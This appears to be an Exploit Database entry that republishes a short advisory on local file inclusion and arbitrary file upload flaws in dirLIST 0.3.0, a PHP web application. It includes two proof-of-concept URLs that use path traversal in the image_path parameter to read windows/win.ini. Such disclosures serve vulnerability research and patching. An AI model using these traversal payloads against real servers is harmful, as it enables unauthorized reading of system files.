Exploit Database - Logo

dirLIST 0.3.0 - Local File Inclusion

EDB-ID: 37617 Author: L0n3ly-H34rT Published: 2012-08-08
CVE: N/A Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/54933/info

dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. 

http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini
http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini

Related Exploits

Trying to match setup file: 3133e43f7dbeae5f2b7e83a19b910e42
Other Possible E-DB Search Terms: dirLIST 0.3.0,  dirLIST
Date D V Title Author
2017-01-17Download Exploit Code Waiting verification dirLIST 0.3.0 - Arbitrary File Uploadhyp3rlinx
2007-10-01Download Exploit Code Verified smbftpd 0.96 - SMBDirList-function Remote Format StringJerry Illik...
Menu